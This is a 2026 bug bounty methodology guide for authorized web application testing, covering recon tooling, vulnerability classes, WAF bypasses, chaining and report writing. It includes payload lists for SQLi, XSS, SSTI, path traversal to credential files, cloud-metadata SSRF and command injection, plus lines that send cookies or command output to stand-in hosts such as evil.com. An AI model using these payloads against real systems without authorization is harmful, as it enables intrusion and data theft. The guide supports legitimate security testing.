## https://sploitus.com/exploit?id=7359C84B-DFD5-5774-B7C5-81611B806D9D
# 2026 Practical Bug Bounty Guide
> Built on real-world experience. Opinionated by design. Updated for 2026.
---
## Table of Contents
1. [Mindset & Core Rules](#1-mindset--core-rules)
2. [Picking a Platform](#2-picking-a-platform)
3. [Picking a Program](#3-picking-a-program)
4. [Phase 1 โ Recon & Asset Discovery](#4-phase-1--recon--asset-discovery)
5. [Phase 2 โ Manual Exploration](#5-phase-2--manual-exploration)
6. [Phase 3 โ Burp Suite Deep Dive](#6-phase-3--burp-suite-deep-dive)
7. [Phase 4 โ Vulnerability Testing](#7-phase-4--vulnerability-testing)
- [XSS](#xss-cross-site-scripting)
- [SSTI](#ssti-server-side-template-injection)
- [SQL Injection](#sql-injection)
- [IDOR / Broken Access Control](#idor--broken-access-control)
- [CSRF](#csrf)
- [SSRF](#ssrf)
- [XXE](#xxe)
- [LFI / RFI](#lfi--rfi)
- [File Upload](#file-upload)
- [Command Injection](#command-injection)
- [Open Redirects](#open-redirects)
- [Authentication & Session](#authentication--session)
- [Business Logic](#business-logic)
- [Modern Attack Surface (2026)](#modern-attack-surface-2026)
8. [WAF Bypass Techniques](#8-waf-bypass-techniques)
9. [Chaining Vulnerabilities](#9-chaining-vulnerabilities)
10. [Reporting](#10-reporting)
11. [Tools Reference](#11-tools-reference)
---
## 1. Mindset & Core Rules
These rules should be tattooed on your brain before you open a single browser tab.
- **PoC or GTFO.** Never submit a report without a working proof of concept that demonstrates real impact. A vulnerability with no impact is noise, not a finding.
- **Know your enemy.** You must understand the application before you attack it. Spend days mapping it โ not hours.
- **Out-think, don't out-race.** Speed hunters pile into obvious endpoints and create duplicates. Find the leftovers: the tacked-on import functions, the legacy API, the feature no one reads the docs for.
- **Every tool lies sometimes.** Scanner alerts are hypotheses, not conclusions. Confirm everything manually.
- **VDP is your training ground.** Less competition, lower-hardened apps, earns you private program invites. Don't chase money before you have a process.
- **Barriers are your friends.** Dutch-only program? Non-English docs? Mobile-only setup process? Other hunters drop off. You push through.
- **Impact is king.** Two vulnerabilities of the same type can have wildly different severities depending on what you can do with them. Always ask: *what can an attacker actually achieve here?*
- **GDPR multiplier (EU targets).** Accessing another user's PII on a European program is a GDPR violation by definition. This significantly raises severity โ use it when you can.
---
## 2. Picking a Platform
There is no single best platform. Pick the one that fits your current level and goals. Below is an honest breakdown.
### Intigriti
**Pros**
- Less crowded than HackerOne or Bugcrowd
- Triagers are helpful and won't sink your reputation for a borderline report
- No negative karma for invalid submissions
- After a few valid findings, you can be invited to the community Slack โ direct access to triagers and the community manager
- Wide range of program types (web, mobile, VPS, IoT)
- Many EU programs in Dutch or other local languages โ install a translate plugin and that barrier becomes your advantage
**Cons**
- Smaller total program count than H1/BC
- Fewer fully public paid programs; most paid work comes through private invites earned over time
### HackerOne
**Pros**
- Largest selection of programs in the world
- Regular CTFs with private program invites as prizes โ great way to get into competitive programs
- Community events and educational resources
**Cons**
- Negative karma for invalid reports; too many puts you in a restricted queue (30-day wait before re-submitting to some programs)
- Very high competition on popular programs
### Bugcrowd
**Pros**
- Massive program selection
- Bugcrowd Academy provides in-depth vulnerability learning resources
- Helpful triager feedback
**Cons**
- Same negative karma system as HackerOne
- High competition
### Finding programs outside platforms
```
site:target.com "responsible disclosure"
site:target.com "bug bounty"
site:target.com "security.txt"
/.well-known/security.txt
```
Use the [bug-bounty-dorks](https://github.com/sushiwushi/bug-bounty-dorks) repository for a full Google dork collection.
---
## 3. Picking a Program
> "Picking a program is like picking a shoe โ make sure it fits."
**What to look for in a target:**
- Applications where you can register accounts and explore features freely
- Multi-user, multi-role applications (admin, manager, member, viewer, etc.) โ these contain business logic bugs that tool scanners miss
- Import/export features, API integrations, and any functionality built *on top of* an existing feature. Integration points are security weak spots
- Swagger/OpenAPI docs or a public developer API โ read them, they are a blueprint
- Applications with a free tier + a paid/premium tier โ scope difference between plans is a common source of BAC bugs
**VDP vs. Paid โ start with VDP:**
| | VDP | Paid |
|---|---|---|
| Competition | Low | High |
| Hardening | Often lower | Often higher |
| Benefit | Points โ private invites | Direct cash payouts |
Start VDP, earn private invites, *then* get paid. The money follows the process.
**Scope advice:**
Avoid programs with `*.target.com` as your first target. A wide wildcard scope sounds exciting but costs you weeks in recon before you even test. Start on main apps (`app.target.com` or `target.com`), refine your technique, *then* scale your recon.
---
## 4. Phase 1 โ Recon & Asset Discovery
> Recon is the foundation. But remember: recon is not hacking. Its only job is to find the surface you will attack.
### Subdomain Enumeration
```bash
# Passive
subfinder -d target.com -o subdomains.txt
assetfinder --subs-only target.com >> subdomains.txt
amass enum -passive -d target.com >> subdomains.txt
# Certificate transparency
# https://crt.sh/?q=%25.target.com
# Deduplicate
sort -u subdomains.txt -o subdomains.txt
```
### Check Which Subdomains Are Alive
```bash
cat subdomains.txt | httprobe | tee alive.txt
```
### Visual Recon (Flyover)
```bash
# EyeWitness or Aquatone for screenshots of every live subdomain
eyewitness --web -f alive.txt --timeout 30
cat alive.txt | aquatone
```
### Port Scanning
```bash
# Fast full-port scan with naabu, confirm with nmap
naabu -iL alive.txt -p - -o open-ports.txt
nmap -sV -sC -p
```
### Directory & Content Discovery
```bash
gobuster dir -u https://target.com -w /path/to/wordlist -x php,html,js,json,bak,old,zip
ffuf -u https://target.com/FUZZ -w /path/to/wordlist -mc 200,301,302,403
```
### JavaScript Analysis
```bash
# Extract URLs from JS files
python3 linkfinder.py -i https://target.com -d -o cli
# Get all historical URLs
gau target.com | tee gau-urls.txt
waybackurls target.com | tee wayback-urls.txt
```
Look specifically for:
- Hardcoded API keys, tokens, or credentials
- Internal endpoint paths not exposed in the UI
- Commented-out code with old endpoint references
### Google & GitHub Dorking
```
# Google
site:target.com filetype:js
site:target.com inurl:api
site:target.com "internal use only"
site:target.com ext:json | ext:xml | ext:yaml
site:target.com "Authorization: Bearer"
# GitHub
org:targetname password
org:targetname secret
org:targetname api_key
org:targetname "Authorization:"
```
Reference: [GitHub Recon - It's Really Deep](https://shahjerry33.medium.com/github-recon-its-really-deep-6553d6dfbb1f)
### Shodan & Passive Sources
```
hostname:target.com
org:"Target Company Name"
ssl:"target.com"
```
### Automated Vulnerability Scanning
```bash
# Nuclei โ run after asset discovery
nuclei -l alive.txt -t nuclei-templates/ -o nuclei-output.txt
# Nikto โ per-host
nikto -h https://target.com
```
> **Important:** Scanner results are starting points, not findings. Every alarm requires manual confirmation before reporting.
---
## 5. Phase 2 โ Manual Exploration
This phase is non-negotiable. No tool replaces understanding the application.
### Setup
1. Open Burp Suite with scope set to the target
2. Proxy all traffic through Burp โ the site map will fill as you browse
3. Create test accounts for every available role (admin, manager, user, viewer, guest)
4. If there is a paid tier, consider buying it โ the reduced attack surface of free accounts is a real limitation
### The Poisoned Registration Trick
When creating accounts or filling any profile field, inject both XSS and SSTI payloads from the start:
```
${{7*7}}{{7*7}}
```
Insert this into every field: username, first name, last name, address, bio, preferences โ everywhere. This payload travels through the application as you use it and may fire in an admin panel, a report PDF, an email template, or a backend system days later.
### Exploration Checklist
- [ ] Use the application as a normal user for each role โ trigger every feature
- [ ] Read the product documentation or knowledge base in full
- [ ] Read the API documentation / Swagger UI if available โ `site:target.com swagger`, `site:target.com api/docs`, `site:target.com openapi.json`
- [ ] Note every privilege level and what each can do
- [ ] Note every integration point: import, export, webhooks, third-party logins, payment flows, email triggers
- [ ] Note every place that accepts file uploads
- [ ] Note every place that renders user-supplied content
- [ ] Note every URL parameter that appears to interact with the backend
- [ ] Create a mindmap: [XMind](https://www.xmind.net/) or any tool you prefer
### Parameters worth flagging immediately
| Pattern | Likely target |
|---|---|
| `url=`, `src=`, `dest=`, `feed=`, `webhook=` | SSRF |
| `file=`, `page=`, `template=`, `path=`, `include=` | LFI/RFI |
| `id=`, `user_id=`, `order=`, `invoice=`, `doc=` | IDOR |
| `redirect=`, `next=`, `returnTo=`, `goto=` | Open Redirect |
| `q=`, `search=`, `name=`, `title=`, `comment=` | XSS / SSTI / SQLi |
| `cmd=`, `exec=`, `shell=`, `ping=`, `host=` | Command Injection |
| Any XML body or file upload accepting XML/DOCX/XLSX/SVG | XXE |
---
## 6. Phase 3 โ Burp Suite Deep Dive
### Filter to Parameterised Requests
In the Burp **Site Map**, open the filter and enable **"Show only parameterized requests"**. This cuts the noise and surfaces the endpoints worth testing.
### Repeater Strategy
For each interesting request:
1. Send it to Repeater
2. Understand what the endpoint does by reading the response carefully
3. Tamper with one parameter at a time โ change values, remove them, duplicate them, send unexpected types (string where int is expected, negative numbers, huge numbers)
4. Look for different responses โ an error, a changed status code, a timing difference
### Intruder / ffuf Strategy
Use Intruder (or ffuf for speed) to:
- Brute-force IDs (sequential integers, UUIDs, hashes)
- Fuzz parameter values with injection payloads
- Test for rate-limiting weaknesses
### Inferring New Endpoints
If you see `/api/v2/getInvoices`, the older `/api/v1/getInvoices` very likely still exists โ and is probably less secure. Always check:
- Version downgrades: `v2` โ `v1`, `v3` โ `v2` โ `v1`
- Alternate resource paths: `/api/admin/`, `/internal/`, `/private/`
- HTTP method tampering: if only `GET` is documented, try `POST`, `PUT`, `DELETE`, `PATCH`
### Hidden Parameters
When saving settings or profile data, intercept the request and look for parameters the UI does not expose. Try adding:
- `role=admin`
- `isAdmin=true`
- `status=active`
- `plan=enterprise`
Mass-assignment vulnerabilities are frequently found this way.
---
## 7. Phase 4 โ Vulnerability Testing
---
### XSS (Cross-Site Scripting)
#### Initial probe โ insert everywhere
```
">alert(1)
{{7*7}}
```
#### Stored XSS
- Test every input that is displayed to any other user: profile fields, comments, messages, product names, filenames, notes
- Start minimal: `test` โ if the tag renders, escalate
- Target admin-facing fields (support ticket subjects, user display names) for higher-severity stored XSS into privileged contexts
#### Reflected XSS
- Test every URL parameter and search query
- Check error pages (404, 403, 500) โ many reflect the URL path or a query parameter
- Check the `Referer` header โ some apps reflect it in error messages
#### DOM XSS
- Check for dangerous JavaScript sinks: `document.write()`, `innerHTML`, `eval()`, `setTimeout()`, `location.href` โ where any of these consume user-controlled input
- DOM XSS never reaches the server, so server-side scanning won't find it
- Burp Suite Pro's scanner can detect DOM XSS; use it as a complement to manual review
#### Blind XSS
- Use [XSS Hunter](https://xsshunter.trufflesecurity.com/) โ you get a callback with a screenshot when your payload fires in an admin panel or backend
- Inject into every field from day one โ payloads can fire days later
- Payloads to use:
```html
">
'">
javascript:eval('var a=document.createElement(\'script\');a.src=\'https://yourxsshunter.xss.ht\';document.body.appendChild(a)')
```
#### XSS Filter Evasion
```html
alert(1)
ipt>alert(1)ipt>
" onmouseover="alert(1)
' autofocus onfocus='alert(1)
'; alert(1)//
\'; alert(1)//
%3Cscript%3Ealert(1)%3C%2Fscript%3E
<script>alert(1)</script>
javascript:/*-->
```
---
### SSTI (Server-Side Template Injection)
Insert into every available field at account creation and throughout testing:
```
{{7*7}} โ 49 = Jinja2, Twig
${7*7} โ 49 = Freemarker, Velocity, JavaScript templates
โ 49 = ERB (Ruby)
#{7*7} โ 49 = Ruby (non-ERB)
*{7*7} โ 49 = Spring (Java)
}}{{7*7}} โ Breakout then inject
```
If confirmed, use [tplmap](https://github.com/epinna/tplmap) for automated exploitation. SSTI can lead to RCE โ escalate carefully and document every step.
---
### SQL Injection
- Inject into every parameter that touches the database: GET/POST body, cookies, HTTP headers (`User-Agent`, `X-Forwarded-For`, `Referer`)
- Start with `'` and observe: error? different response? timing change?
**Quick detection payloads:**
```sql
'
''
`
`)
'))
' OR '1'='1
' OR 1=1--
' AND SLEEP(5)--
1; SELECT SLEEP(5)--
{"$gt":""} (NoSQL โ MongoDB)
```
**Time-based blind:**
```sql
' AND SLEEP(5)--
'; WAITFOR DELAY '0:0:5'-- (MSSQL)
' AND BENCHMARK(5000000,MD5(1))--
```
Once a parameter confirms injection, automate with `sqlmap`:
```bash
sqlmap -u "https://target.com/page?id=1" --level=5 --risk=3 --batch
# For POST:
sqlmap -u "https://target.com/login" --data="user=admin&pass=test" --batch
```
Also test for **second-order SQLi**: data stored harmlessly now may be used in a later query without sanitisation.
---
### IDOR / Broken Access Control
**Setup: create all the accounts you need**
- User A and User B (same role) โ for horizontal IDOR
- Admin and Standard user โ for vertical BAC
- Two separate organisations/tenants if applicable โ for tenant isolation testing
**Test methodology:**
1. Perform an action as User A, capture the request in Burp
2. Copy the request to Repeater, switch session cookie to User B (use Burp's multi-session feature or manually swap cookies)
3. Replace any object identifiers (IDs, GUIDs, slugs) with resources owned by User A
4. Observe whether User B can access or modify User A's resources
**Where to look:**
- `GET /users/{id}`, `GET /orders/{id}`, `GET /invoices/{id}`
- `PUT/PATCH /profile/{id}`, `DELETE /document/{id}`
- API responses that contain other users' data
- Export functions โ does exporting your data accidentally include other users' data?
- Webhook configurations that reference other accounts
**GUID IDOR amplification:** if a GUID is used and you think it limits the bug's severity, find an endpoint that *leaks* or *lists* those GUIDs. That leak + the IDOR forms a complete exploit chain and significantly improves the severity rating.
---
### CSRF
Focus only on **authenticated, state-changing actions** โ not login/logout.
**Test:**
- Does the sensitive request (email change, password change, account deletion, payment) include a CSRF token?
- Submit with a wrong token โ does the server accept it?
- Remove the CSRF token parameter entirely โ does the server accept it?
- Check `SameSite` cookie attribute โ `None` or absent = higher CSRF risk
**Minimal CSRF PoC:**
```html
document.forms[0].submit();
```
**Chain ideas:** CSRF โ email change โ password reset link sent to attacker = full account takeover.
---
### SSRF
**Where to look:**
- Parameters: `url=`, `src=`, `dest=`, `feed=`, `webhook=`, `callback=`, `redirect=`, `load=`, `proxy=`
- Any feature that fetches a URL on your behalf (link preview, PDF generation, webhook, import from URL)
**Detect blind SSRF first:**
```
https://your-collaborator-id.burpcollaborator.net
https://your-subdomain.interactsh.com
```
If you get a DNS/HTTP callback โ SSRF is confirmed.
**Escalate to internal resources:**
```
http://127.0.0.1/
http://localhost/admin
http://169.254.169.254/latest/meta-data/ (AWS)
http://169.254.169.254/latest/meta-data/iam/security-credentials/
http://metadata.google.internal/computeMetadata/v1/ (GCP โ needs header)
http://169.254.169.254/metadata/instance?api-version=2021-02-01 (Azure)
http://192.168.0.1/
```
**Filter bypass techniques:**
```
http://[::1]/ IPv6 localhost
http://2130706433/ Decimal IP for 127.0.0.1
http://0x7f000001/ Hex IP
http://127.1/ Short form
http://127.0.0.1#@evil.com Hash trick
http://target.com@127.0.0.1 @ notation
```
---
### XXE
Test everywhere XML is consumed โ including document uploads.
**Basic file read:**
```xml
]>
&xxe;
```
**SVG upload (XXE via image upload):**
```xml
]>
&xxe;
```
**DOCX/XLSX XXE:** these formats are ZIP archives. Unzip, embed the XXE payload in `word/document.xml` or `xl/workbook.xml`, re-zip and upload.
**Blind XXE (out-of-band):**
```xml
%xxe;
]>
```
---
### LFI / RFI
**Detection:** parameters like `file=`, `page=`, `template=`, `path=`, `include=`, `module=`
**Linux traversal:**
```
../../../../etc/passwd
../../../../etc/shadow
../../../../proc/self/environ
../../../../var/log/apache2/access.log
```
**Windows traversal:**
```
..\..\..\windows\win.ini
..\..\..\windows\system32\drivers\etc\hosts
```
**PHP wrappers:**
```
php://filter/convert.base64-encode/resource=/etc/passwd
php://filter/read=string.rot13/resource=/etc/passwd
php://input (POST body as PHP)
expect://id
```
**Null byte (old PHP):**
```
../../../../etc/passwd%00
```
---
### File Upload
**Extension bypass order of operations:**
1. Upload `.php` โ blocked? Try `.php5`, `.phtml`, `.phar`, `.shtml`
2. Change `Content-Type` to `image/jpeg` while keeping dangerous extension
3. Double extension: `shell.php.jpg`, `shell.jpg.php`
4. Null byte: `shell.php%00.jpg`
5. Upload SVG with XSS or XXE payload
6. Upload DOCX/XLSX with XXE payload
**Web shell (PHP):**
```php
```
**After upload:** is the file served from a web-accessible path? If yes, a web shell is directly executable via browser.
---
### Command Injection
**Target parameters:** anything that looks like it executes a system call โ hostname, IP address, domain, filename, shell options, email address (in some mail-sending features)
**Chaining operators:**
```bash
; id
| id
|| id
&& id
`id`
$(id)
%0Aid (URL-encoded newline)
```
**Blind via timing:**
```bash
; sleep 5
| ping -c 5 127.0.0.1
```
**Blind via out-of-band:**
```bash
; curl https://your-collaborator.com/$(whoami)
; nslookup $(whoami).your-collaborator.com
```
**Windows variants:**
```cmd
& whoami
| whoami
&& whoami
; whoami
%26 whoami
```
---
### Open Redirects
**Target parameters:** `redirect=`, `url=`, `next=`, `return=`, `returnTo=`, `goto=`, `target=`, `redir=`, `destination=`
**Basic test:**
```
redirect=https://evil.com
redirect=//evil.com
redirect=javascript:alert(1)
```
**Bypass techniques:**
```
https://target.com@evil.com
https://target.com.evil.com
https://evil.com%23target.com
https://evil.com%3F.target.com
//evil.com/%2F..
```
Open redirects are low severity alone. Demonstrate a realistic chain (e.g., OAuth code theft, phishing) to elevate severity.
---
### Authentication & Session
**Username enumeration:**
- Compare responses for valid vs. invalid usernames (timing, message, status code)
- Test registration: "email already in use" confirms account existence
**Password reset:**
- Add a second `email` parameter: `email=victim@target.com&email=attacker@evil.com`
- Check if reset tokens are in the URL (they will appear in server logs and Referer headers)
- Test token reuse: can you use the same token twice?
- Test for weak/predictable tokens (sequential, timestamp-based)
**JWT testing:**
```bash
# alg:none attack โ remove signature entirely
# Algorithm confusion โ if RS256 is used, try HS256 signed with the public key
# Weak secret bruteforce
hashcat -a 0 -m 16500 /usr/share/wordlists/rockyou.txt
```
**Session management:**
- Does the session token change after login? (session fixation if not)
- Does logout invalidate the token server-side?
- Is the token in a URL parameter anywhere?
- Does the token remain valid after password change?
- After deleting an account, does the session still work?
**Cookie flags (check all session cookies):**
| Flag | If missing |
|---|---|
| `HttpOnly` | XSS can steal the cookie |
| `Secure` | Cookie sent over HTTP |
| `SameSite=Strict/Lax` | CSRF risk increases |
| Correct `Domain` scope | Subdomain can read cookie |
---
### Business Logic
This is where the unloved bugs live and duplicate rates are lowest.
**What to test:**
- **Race conditions:** two requests for the same limited resource sent simultaneously (use Burp's "Send group in parallel" feature). Classic targets: coupon codes, referral bonuses, stock purchase, loyalty points
- **Negative values:** enter `-1` quantity in a cart, transfer `-100` to someone โ do you gain money?
- **Workflow bypass:** skip a required step in a multi-step process (e.g., skip payment, skip verification)
- **State manipulation:** send a request that is only valid in state A while the resource is in state B
- **Limit bypass:** a feature limits you to 5 items โ can you send 6 by replaying or modifying a request?
- **Privilege gates:** does the price come from the client? Does the role come from the client?
---
### Modern Attack Surface (2026)
#### GraphQL
Many applications have moved to GraphQL but left introspection enabled in production.
```bash
# Check if introspection is enabled
{"query": "{__schema{types{name}}}"}
# Full schema dump
python3 graphql-map.py --url https://target.com/graphql
# Common issues
# - IDOR via object IDs in query args
# - Missing auth checks on mutations
# - Batching attacks (rate limit bypass by sending many queries in one request)
# - Introspection in production (information disclosure)
```
#### WebSockets
- Intercept WebSocket messages in Burp
- Test message tampering โ is server-side validation as strict as HTTP endpoints?
- Test cross-site WebSocket hijacking (CSWSH)
- Look for user IDs or session tokens embedded in messages
#### OAuth 2.0 / OIDC
- Test for `state` parameter absence or reuse โ CSRF on OAuth flow
- Test `redirect_uri` validation โ can you redirect the code to an attacker-controlled domain?
- Test for open redirect chaining: `redirect_uri=https://target.com/logout?redirect=https://evil.com`
- Test for code reuse: can an authorization code be used more than once?
- Check PKCE implementation โ absence of PKCE in public clients is a finding
#### API Keys & JWT in JS Files
```bash
# Automated
trufflehog filesystem /path/to/js/files
# Or grep JS files from gau/wayback output
grep -rE "(api_key|apikey|secret|token|password|Authorization)" *.js
```
#### Prototype Pollution (JavaScript)
```
?__proto__[admin]=true
?constructor[prototype][admin]=true
```
Confirm in browser devtools: `Object.prototype.admin` should return `true` if vulnerable.
#### Cache Poisoning
- Test unkeyed headers: `X-Forwarded-Host`, `X-Forwarded-Port`, `X-Host`
- If any of these are reflected in the response or influence caching, you may be able to poison the cache for all users
#### Subdomain Takeover
Identify subdomains pointing to decommissioned external services (GitHub Pages, Heroku, Azure, Fastly):
```bash
subzy run --targets subdomains.txt
nuclei -l subdomains.txt -t nuclei-templates/dns/
```
Look for CNAME records pointing to unclaimed services. Claim the service โ full control of that subdomain.
---
## 8. WAF Bypass Techniques
### Generic Techniques
```
# Base64 data URI
data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==
# Space substitution
(%09 = tab)
# Comment injection (SQL)
SE/**/LECT
UN/**/ION
# Case variation
SeLeCt 1,2,3
# URL encoding (single and double)
%3Cscript%3E
%253Cscript%253E
# Unicode lookalikes
ฤ instead of e (some WAFs normalise, some don't)
# Newlines in JS URI
j%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At:alert(1)
# Wildcard/comment injection in file paths (command injection bypass)
/etc/pa*wd
/etc/pa's'wd
cat${IFS}/etc/passwd
# Custom HTML tags
#x
```
### Barracuda Specific
```html
Right-Click Here
```
### Reference
Full WAF bypass collection: [Awesome-WAF](https://github.com/0xInfection/Awesome-WAF#known-bypasses)
---
## 9. Chaining Vulnerabilities
Solo low-severity bugs become high-severity chains. Always ask: *can I combine this with something else?*
### XSS โ Account Takeover
1. Find stored XSS in a field visible to admins
2. Payload steals the admin's non-HttpOnly session cookie: `fetch('https://evil.com/?c='+document.cookie)`
3. Use the stolen cookie to authenticate as the admin
**Amplifier:** if the session token never rotates, the stolen cookie is valid indefinitely.
### XSS โ CSRF Bypass
Stored XSS bypasses CSRF tokens entirely โ the JavaScript runs in the victim's browser and can read the CSRF token from the DOM, then submit a request with it.
```javascript
fetch('/settings').then(r => r.text()).then(html => {
const token = html.match(/csrf_token" value="([^"]+)"/)[1];
fetch('/settings/email', {
method: 'POST',
body: `email=attacker@evil.com&csrf_token=${token}`
});
});
```
### CSRF โ Stored XSS โ Worm
1. CSRF tricks the victim into posting content with a stored XSS payload
2. That XSS payload then replicates itself via CSRF to every user who views the page
### IDOR + Information Leak โ Full Account Enumeration
1. Find an endpoint that leaks or lists user GUIDs (low/info)
2. Use those GUIDs in an IDOR to access every user's data (escalates to medium/high)
### Open Redirect โ OAuth Code Theft
1. OAuth callback URL accepts open redirects: `redirect_uri=https://target.com/callback?next=https://evil.com`
2. After OAuth flow, the authorization code is in the URL, and the redirect sends the victim (with the code in the Referer header) to the attacker's server
### SSRF โ Cloud Metadata โ RCE
1. Find SSRF pointing to internal network
2. Access `http://169.254.169.254/latest/meta-data/iam/security-credentials/`
3. Leaked AWS credentials allow direct access to S3, EC2, etc.
### Password Reset + CSRF โ Account Takeover
1. CSRF triggers a password reset
2. Reset link is sent to victim's email โ not directly exploitable
3. *But:* CSRF on the "change email" endpoint first, before triggering the reset โ reset link goes to attacker's email
---
## 10. Reporting
A great bug reported badly gets marked as informational. A clear, well-structured report earns you the payout and the reputation.
### Report Structure
```
Title: [Severity] Short, specific description
e.g. [High] Stored XSS in user display name allows session cookie theft
Severity: Critical / High / Medium / Low / Informational
CVSS: (if the program uses it)
Summary:
A 2-3 sentence description of the vulnerability, affected component, and impact.
Steps to Reproduce:
1. Log in as User A
2. Navigate to Settings โ Profile
3. Set display name to:
4. Save
5. Log in as User B, navigate to the admin user list
6. The payload fires in the admin context โ XSS executes as admin
Impact:
Explain what an attacker can concretely achieve. Reference data, accounts, or systems at risk.
Mention GDPR implications if PII is accessible (EU programs).
PoC:
Screenshot, screen recording, or Burp export confirming the finding.
Remediation (optional but welcomed):
Short suggestion: encode user-supplied data before rendering in HTML.
```
### Severity Calibration Tips
- **No impact = no finding.** If you can't articulate what an attacker gains, do more work before submitting.
- **Escalate with chains.** An open redirect is low. An open redirect + OAuth code theft is high.
- **GDPR is a severity multiplier** on EU targets. Accessing another user's PII is a violation beyond the technical bug.
- **Admin-only XSS** is still valid โ demonstrate what an attacker can do once they have admin XSS.
- **Self-XSS** is almost universally out of scope unless you can show a realistic delivery vector.
---
## 11. Tools Reference
### Proxy & Interception
| Tool | Use |
|---|---|
| Burp Suite Pro | Core proxy, scanner, Collaborator (SSRF/blind XSS/blind XXE detection) |
| OWASP ZAP | Free alternative; useful for automated scanning |
### Recon
| Tool | Use |
|---|---|
| subfinder | Passive subdomain enumeration |
| assetfinder | Fast passive subdomain discovery |
| amass | In-depth subdomain enumeration |
| httprobe | Check which subdomains are live |
| aquatone / EyeWitness | Subdomain screenshot flyover |
| gau / waybackurls | Historical URL discovery |
| linkfinder | Extract endpoints from JS files |
| naabu | Fast port scanner |
| nmap | Detailed port/service scanner |
| shodan | Passive internet-wide scanning |
| crt.sh | Certificate transparency lookup |
### Fuzzing & Scanning
| Tool | Use |
|---|---|
| gobuster / ffuf / feroxbuster | Directory & content brute-forcing |
| sqlmap | SQL injection automation |
| nuclei | Template-based vulnerability scanning |
| nikto | Web server misconfiguration scanner |
| dalfox | XSS automation and parameter fuzzing |
| tplmap | SSTI exploitation |
| subzy | Subdomain takeover detection |
### Reporting & Tracking
| Tool | Use |
|---|---|
| XSS Hunter | Blind XSS callback receiver with screenshots |
| Burp Collaborator | Out-of-band detection (SSRF, blind SQLi, XXE, SSTI) |
| interactsh | Open-source Collaborator alternative |
| Caido | Modern Burp alternative (rising in 2026) |
### Custom Scripts (this workspace)
| Script | Purpose |
|---|---|
| [AutoSubdomainContentDiscXSSDalfox.py](Scripts/AutoSubdomainContentDiscXSSDalfox.py) | Automates subdomain enum โ content discovery โ XSS scanning |
| [BugBountyAutomator.py](Scripts/BugBountyAutomator.py) | Full-pipeline bug bounty automation |
| [BACProxy.py](Scripts/BACProxy.py) | Broken access control proxy testing |
| [autoScan.sh](Scripts/autoScan.sh) | Initial automated scan wrapper |
| [initialScan.sh](Scripts/initialScan.sh) | First-pass target scan |
| [webapp_pentest.py](Scripts/webapp_pentest.py) | Web app pentest helper |
### Wordlists
- [dir23.txt](wordlists/dir23.txt) โ directory brute-forcing
- [dirlist.txt](wordlists/dirlist.txt) โ directory brute-forcing
- SecLists (install separately): `git clone https://github.com/danielmiessler/SecLists`
---
## Quick Reference Card
```
PHASE 1 โ RECON
subfinder + assetfinder + amass โ subdomains
httprobe โ alive hosts
gau + waybackurls โ historical URLs
linkfinder โ JS endpoints
nuclei โ automated scanning
Google + GitHub dorking
PHASE 2 โ EXPLORE
Register all roles
Inject XSS + SSTI payload into every field from the start
Read docs, API docs, Swagger
Map all features and integration points
Flag interesting parameters by type
PHASE 3 โ BURP DEEP DIVE
Filter to parameterised requests
Repeater each interesting endpoint
Infer API versions (v2 โ v1)
Test HTTP method tampering
Hunt for mass assignment (add role/admin params)
PHASE 4 โ TEST
XSS โ SSTI โ SQLi โ IDOR โ CSRF โ SSRF โ XXE
Auth & session checks
Business logic (race conditions, negative values, workflow bypass)
Modern surface: GraphQL, WebSockets, OAuth, prototype pollution
CHAIN โ REPORT
Combine low bugs into high chains
PoC first โ no PoC, no report
Prove impact explicitly
GDPR multiplier on EU targets
```
---
*Last updated: March 2026. Built on Rat's methodology and practical experience. Expand this guide with every new finding.*